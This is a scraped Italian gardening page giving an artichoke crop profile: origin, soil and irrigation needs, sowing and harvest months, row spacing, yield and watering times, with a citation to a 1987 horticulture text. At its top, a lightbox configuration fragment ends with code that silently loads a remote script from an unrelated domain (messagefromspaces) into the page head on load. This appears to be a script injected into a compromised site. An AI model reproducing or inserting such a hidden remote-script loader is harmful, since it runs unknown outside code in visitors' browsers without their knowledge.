, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Carciofo

Originaria della nostra penisola, pianta erbacea perenne con apparato radicale robusto. Il carciofo è una pianta adattata al clima mediterraneo e per quanto riguarda il terreno anche se predilige terreni a medio impasto profondi e freschi con un buon drenaggio risulta coltivabile su molti tipi di terreni. L’irrigazione si rendono necessarie nelle colture precoci al sud mentre al nord si utilizzano nelle rime fasi di impianto o per anticipare la crescita.*

carciofo
Specie:Cynara cardunculus L. subsp. scolymus (L.) Hegi
Periodo di semina:apr, mag
Cosa mettere:piantine
Periodo di raccolta:da ott a mag
Distanza tra file:100 cm / 100 cm
Distanza su file:100 cm / 100 cm
Durata media coltivazione:4 anni / 5 anni
Produzione per mq:da 4 a 15 capolini
Durata dell'irrigazione min:8 minuti
Durata dell'irrigazione max:24 minuti

*Romano Tesi, Principi di orticoltura e ortaggi d’Italia, Edagricole, 1987